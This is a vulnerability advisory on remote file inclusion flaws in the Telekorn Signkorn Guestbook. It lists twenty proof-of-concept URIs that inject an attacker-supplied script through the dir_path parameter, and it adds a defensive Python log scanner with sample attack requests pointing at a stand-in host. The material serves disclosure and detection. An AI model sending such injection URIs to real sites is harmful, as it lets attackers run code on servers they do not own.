
Telekorn Signkorn Guestbook Dir_Path Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:
http://www.example.com/[Script]/index.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/smile.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/entry.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/admin/preview.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/admin/log.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/admin/index.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/admin/config.php?dir_path=[U r Evil Script]
http://www.example.com/[Script]/admin/admin.php?dir_path=[U r Evil Script]
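
Every URI above carries a dir_path query parameter, so a request whose dir_path value is a URL or stream wrapper rather than a local path is the thing to look for in web server logs. The following is an added example, not part of the original advisory: it assumes Apache common/combined log format, and the /guestbook/ install path, addresses and log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a common/combined access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A dir_path that starts with scheme:// (http, ftp, php, ...) or data: is not a local path.
REMOTE_SCHEME = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)

def dir_path_findings(log_lines):
    """Return (line_no, script_path, dir_path_value) for each suspicious request."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl percent-decodes once; decode again to catch double encoding.
            value = unquote(value)
            if key.lower() == "dir_path" and REMOTE_SCHEME.match(value):
                findings.append((n, url.path, value))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2009:10:01:02 +0000] "GET /guestbook/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2009:10:01:09 +0000] "GET /guestbook/help.php?dir_path=http://203.0.113.5/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [12/Mar/2009:10:01:15 +0000] "GET /guestbook/admin/log.php?dir_path=ftp%3A%2F%2F203.0.113.5%2Fx HTTP/1.1" 200 90',
    '192.0.2.44 - - [12/Mar/2009:10:02:40 +0000] "GET /guestbook/smile.php?dir_path=./ HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for line_no, script, value in dir_path_findings(SAMPLE_LOG):
        print(f"line {line_no}: {script} dir_path={value!r}")
```

A 200 response to a flagged request is worth following up: check whether the web server made an outbound connection to the host named in dir_path at that time.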







 

Copyright 2009, SecurityFocus